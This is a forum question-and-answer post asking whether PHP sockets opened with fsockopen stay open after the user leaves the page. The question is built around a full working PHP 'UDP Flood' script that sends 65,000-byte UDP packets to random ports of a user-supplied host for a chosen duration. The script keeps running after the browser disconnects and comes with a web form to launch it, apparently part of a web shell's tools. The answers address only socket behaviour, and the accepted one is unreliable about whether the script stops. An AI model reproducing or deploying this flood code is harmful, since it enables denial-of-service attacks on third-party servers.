# Do sockets opened with fsockopen stay open after you leave the page via your browser?

Tags: php, fsockopen

```
if(isset($_GET['host'])&&is_numeric($_GET['time'])){
    $pakits = 0;
    ignore_user_abort(TRUE);
    set_time_limit(0);

    $exec_time = $_GET['time'];

    $time = time();
    //print "Started: ".time('h:i:s')."<br>";
    $max_time = $time+$exec_time;

    $host = $_GET['host'];

    for($i=0;$i<65000;$i++){
            $out .= 'X';
    }
    while(1){
    $pakits++;
            if(time() > $max_time){
                    break;
            }
            $rand = rand(1,65000);
            $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
            if($fp){
                    fwrite($fp, $out);
                    fclose($fp);
            }
    }
    echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n";
    echo '<br><br>
        <form action="'.$surl.'" method=GET>
        <input type="hidden" name="act" value="phptools">
        Host: <input type=text name=host value=localhost>
        Length (seconds): <input type=text name=time value=9999>
        <input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
            <form action=? method=GET>
            <input type="hidden" name="act" value="phptools">
            Host: <br><input type=text name=host value=localhost><br>
            Length (seconds): <br><input type=text name=time value=9999><br>
            <br>
            <input type=submit value=Go></form>';
}
```

I've been looking around and asking my friends for awhile now, if I use this script to tell the server to open the sockets using fsockopen, if I leave the webpage will the sockets remain open until the duration is completed?

Answer (score 0, accepted):

No, it simply returns a pointer to a file which you can use with **fopen()**, or **fwrite()** etc.

But then you will need to close the file once you are done with it with **fclose()**.  See more details at: http://us.php.net/manual/en/function.fsockopen.php

Answer (score 3):

It closes as soon as the request is complete. Staying on the page has nothing to do with it.

Comment: Thank you, that's what I thought but I needed a direct answer lol.